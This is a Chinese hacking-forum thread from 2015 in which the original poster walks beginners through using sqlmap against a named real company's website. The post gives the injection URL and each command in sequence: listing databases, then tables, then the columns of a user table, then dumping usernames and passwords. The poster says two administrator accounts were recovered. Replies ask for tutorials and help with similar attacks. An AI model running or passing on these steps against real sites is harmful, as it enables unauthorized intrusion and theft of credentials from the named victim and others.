楼主: 小沫

(小白,大牛勿喷!)kali linux下sqlmap的简单检测

[复制链接]
  • TA的每日心情
    无聊
    2015-6-19 12:24
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2015-3-8 12:10:06 | 显示全部楼层 |阅读模式
    kali linux下sqlmap的简单检测

    不shall不提权,就是简单的注入测试。

    目标网址:http://www.cqyuhe.com/(重庆渝和实业有限公司)

    注入点:http://www.cqyuhe.com/news_view.php?id=4


    打开sqlmap输入sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" –dbs


    QQ截图20150304013539.jpg
    爆出两个表名

    选择a0617152856
    爆破表名

    sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" -D a0617152856 –tables

    得出
    2.jpg

    接下来选择userinfo(用户信息)进行爆破列名
    sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" -D a0617152856 -T userinfo –columns
    得出

    3.jpg

    然后选择username和userpwd进行猜解内容

    sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" --dump -D  a0617152856 -T userinfo -C username,userpwd

    最后得出

    4.jpg

    两个管理员账户和密码

    比较简单,大牛请放过我

    评分

    参与人数 2i币 +9 收起 理由
    以谁为师 + 5 有图有真相!
    契约 + 4 支持原创

    查看全部评分

    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-3-8 12:50:17 | 显示全部楼层
    小白,完全看不懂,哎
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2015-6-19 12:24
  • 签到天数: 2 天

    [LV.1]初来乍到

     楼主| 发表于 2015-3-8 13:10:27 | 显示全部楼层
    战神-保家卫国 发表于 2015-3-8 12:50
    小白,完全看不懂,哎

    额   其实跟手工注入差不多   首先是暴库,然后选择数据库爆表名,得出表名再爆表名就得出表下面的列名了,然后根据自己需要对列名进行猜解。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-3-8 13:50:31 | 显示全部楼层
    战神-保家卫国 发表于 2015-3-8 12:50
    小白,完全看不懂,哎

    对不起哈,我是小白,一点点都不懂的小白,请问,有什么具体的教程吗
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2015-6-19 12:24
  • 签到天数: 2 天

    [LV.1]初来乍到

     楼主| 发表于 2015-3-8 14:03:22 | 显示全部楼层
    战神-保家卫国 发表于 2015-3-8 13:50
    对不起哈,我是小白,一点点都不懂的小白,请问,有什么具体的教程吗

    教程我以前有   现在没有了   
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-3-8 14:10:30 | 显示全部楼层
    小沫 发表于 2015-3-8 14:03
    教程我以前有   现在没有了

    好吧,还是谢谢大神提供教程,我还是需要并且能看懂的时候再来吧
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-9-13 12:01
  • 签到天数: 364 天

    [LV.8]以坛为家I

    发表于 2015-5-10 14:10:02 | 显示全部楼层
    楼主能发下这类相关的学习资源么。。。最好是有整套的,,,我找到的都是些以前的,如阿d,明小子类的。。。{:soso_e154:}
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-4-7 13:15
  • 签到天数: 106 天

    [LV.6]常住居民II

    发表于 2015-5-10 16:30:00 来自手机 | 显示全部楼层
    战神-保家卫国 发表于 2015-3-8 13:50
    对不起哈,我是小白,一点点都不懂的小白,请问,有什么具体的教程吗

    百度搜索sqlmap使用笔记,很多结果。 sqlmap不只是linux能用,也有windows版的。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-4-7 13:15
  • 签到天数: 106 天

    [LV.6]常住居民II

    发表于 2015-5-10 16:34:11 来自手机 | 显示全部楼层
    conosc 发表于 2015-5-10 14:10
    楼主能发下这类相关的学习资源么。。。最好是有整套的,,,我找到的都是些以前的,如阿d,明小子类的。。 ...

    这类注入工具的使用方法都是大同小异的,都是爆库爆表爆列爆字,只不过一个是图形界面一个是字符界面。linux的工具想知道它都有什么功能只要输入工具名+空格+-help 就出来了。比windows工具方便多了。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-9-13 12:01
  • 签到天数: 364 天

    [LV.8]以坛为家I

    发表于 2015-5-10 18:44:12 | 显示全部楼层
    孤独患者 发表于 2015-5-10 16:34
    这类注入工具的使用方法都是大同小异的,都是爆库爆表爆列爆字,只不过一个是图形界面一个是字符界面。li ...

    能问下么,是我代码敲错了还是???怎么用sqlmap就找不到这表,之后读取字段也读取不到。。。不知是那的问题,,,
    用啊d就给扫出来了,郁闷啊。。。。
    001.jpg
    002.jpg
    003.jpg
    004.jpg
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 21:32 , Processed in 0.032840 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部